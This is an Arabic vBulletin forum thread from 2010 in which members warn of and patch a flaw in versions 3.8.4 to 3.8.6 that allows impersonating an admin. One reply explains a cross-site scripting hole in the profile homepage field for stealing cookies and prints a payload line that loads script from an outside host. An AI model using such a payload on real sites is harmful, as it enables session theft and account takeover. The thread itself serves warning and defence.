مشاهدة النسخة كاملة : عاجل جدا ثغره خطيره في 3.8.4 + 3.8.5 + 3.8.6
عذب القوافي
31-08-10, 05:00 AM
السلام عليكم
السلام عليكم
ظهرت اليوم ثغرة او خطأ جديد لمنتدى vBulletin
الاستغلال يمكن تطبيقه على الاصدارات التالية 3.8.4 & 3.8.5 & 3.8.6
الاستغلال هو تسجيل ادمن جديد يحمل نفس اسم الادمن الحالي مثلاً Hussin X
طريقة الاستغلال هي كالتالي :
الدخول لمنطقة التسجيل للموقع المستهدف
الثغره تسمح بالشخص التسجيل بعضويه نفس عضوية الادمن ويمكنه قراءة الرسائل ويمكنه طلب الرقم السري من البريد ومعرفه كل ماهو لدي الادمن
الترقيع
حمل الملف المرفق لك
افتحه
وانسخ الكود الذي بداخله
اذهب الى خيارات المنتدى
خيارات الرقابه
ضع الكود في الكلمات الممنوعه
وكأجراء اخر ايضا
اذهب الى خيارات تسجيل الاعضاء
ضع الكود ضمن مساحة الاسماء الممنوعه
الثغره حقيقيه وقمت بتجربتها هنا وتعمل وتم الترقيع لله الحمد
بالتوفيق
الكود مرفق لكم ولن اطرح طريقة الاستغلال
كما انه لن يعمل اذا طرح مباشره لانه ممنوع لدينا
يہْكہْفيہْك صہمْتہْي
31-08-10, 05:09 AM
يعطيك ربي الف عافية شوكرا جزيل لجهودك المتميزة والرائعة اخوي
لاعدمناك ولا عدمنا جديدك مبدع
كل الشششكر ,,’
جاري التطبيق
جزاك الله خيير ع الترقيع
ملوك الإمارات
31-08-10, 06:24 AM
شكرا اخي عذووب على الخبر
والترقيع
جزاك الله الف خير
مودتي
ابو تركي
31-08-10, 07:57 AM
ربي يجزك خير خوي عذوب ويرحم ولديك
تم الترقيع بارك الله فيك
تحياتي
يسلمو بوسعود جزالك الله خير
تقبل مرورى شيرو
TOM.JERY
31-08-10, 06:32 PM
جزاك الله كل خير ع التنبيه
سجدة المصريه
02-09-10, 12:43 AM
ربي يجزك خير
السلام عليكم
ظهرت اليوم ثغرة او خطأ جديد لمنتدى vBulletin
الاستغلال يمكن تطبيقه على الاصدارات التالية 3.8.4 & 3.8.5 & 3.8.6
الاستغلال هو تسجيل ادمن جديد يحمل نفس اسم الادمن الحالي مثلاً Hussin X
/
وعليكم آلسلآإم ورحمـة آلله ~
\
آول شـى يـآلغآإلى آشـكرك ع طـرح آلثـغره
وآإحب آضيـف آنـهآإ هآإذى آلثـغره تم صدورهآ قبل 5 شـهور
وأصابت الاصدارات 3.8.4 , 3.7.6 و 3.6.12
حيث يستغل المهاجم خطأ في طريقة تحقق سكريبت vB من حقل "الصفحة الشخصية"
بشكل صحيح مما يمكّنه من زرع كود Javascript مكان رابط الصفحة الشخصيّة
وتطورت قبل آيآإم لتـشـمـل آلنسـخ 3.8.5 ،3.8.6
/
طريقة الاستغلال هي كالتالي :
الدخول لمنطقة التسجيل للموقع المستهدف
الثغره تسمح بالشخص التسجيل بعضويه نفس عضوية الادمن ويمكنه قراءة الرسائل ويمكنه طلب الرقم السري من البريد ومعرفه كل ماهو لدي الادمن
آو عن طريق
سرقة الكوكيز الخاصّة بالمستخدم أو مدير المنتدى
وارسالها الى المهاجم
وهذا يمكّنه من الدخول الى المنتدى باسم المستخدم أو مدير المنتدى
دون الحاجة لمعرفة كلمة مرور).
/
ويآإتى آلآإخترآإق آو سرقة آلكوكيز كآإلأتى ~
/
في الملف الشخصي يستطيع الأعضاء وضع رابط للصفحة الشخصيّة
, فيتأكد سكريبت vBulletin من وجود www في الرابط الذي وضعه المستخدم
أو عن طريق Regex يتحقق من مدخلات المستخدم (الأحرف a-z , الأرقام 1-9 بالاضافة لوجود( ://).)
بهذه الحالة يستطيع المهاجم وضع هآإذآ آلكود
كود آلهجوم آلإستبآقـى في حقل الصفحة الشخصية:
مـعذره لن آطرح آلكـود ~
\
مما يؤدي لظهور نافذة تحتوي على الرقم 0
وهذا يدل على تشغيل كود الجافا سكريبت
آنظر جيدآًَ بآلكود بـعد آلإستغلآإل
javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')
(من المحتمل تطوير الاستغلال السابق ليعمل على آلجهوم آلأستبآقـى بآلسيرفر ككل
وليس بآلمنتدى فقط
\
ومثل مآإتفضـلت إخى آلكريم
آحسـن طريـقـه
لـسد هآإذى آلثـغره
هيـى مـنع آلداله 0
وعلآمة دفع آلإستبآقى عند آلمهآجميـن &#
/
آو مرآإجـعة هآإذآ (آإلرآإبط (http://forum.intern0t.net/exploits-vulnerabilities-pocs/1502-vbulletin-3-8-4-cross-site-script-redirection.html)) ~
\
آإحترآإمي للجمـيـع
/
شـآإعر
جيراح الحب
03-09-10, 07:10 PM
تم الترقيع والحمدلله لشرح الاخ عذووب
بالنسبة للاخ شاعر بلا مشاعر
ممكن يشرح كيف منع الداله
,,
,
مشكورين ليكم جميعا
نحن دائما
نسعى وراء شعار
لا خير فى كاتم العلم
باسم الرقب
12-01-11, 06:53 PM
يعطيك الف عافيه اخي عذووووووووووووووب
vBulletin® v3.8.2, Copyright ©2000-2012, TranZ by Almuhajir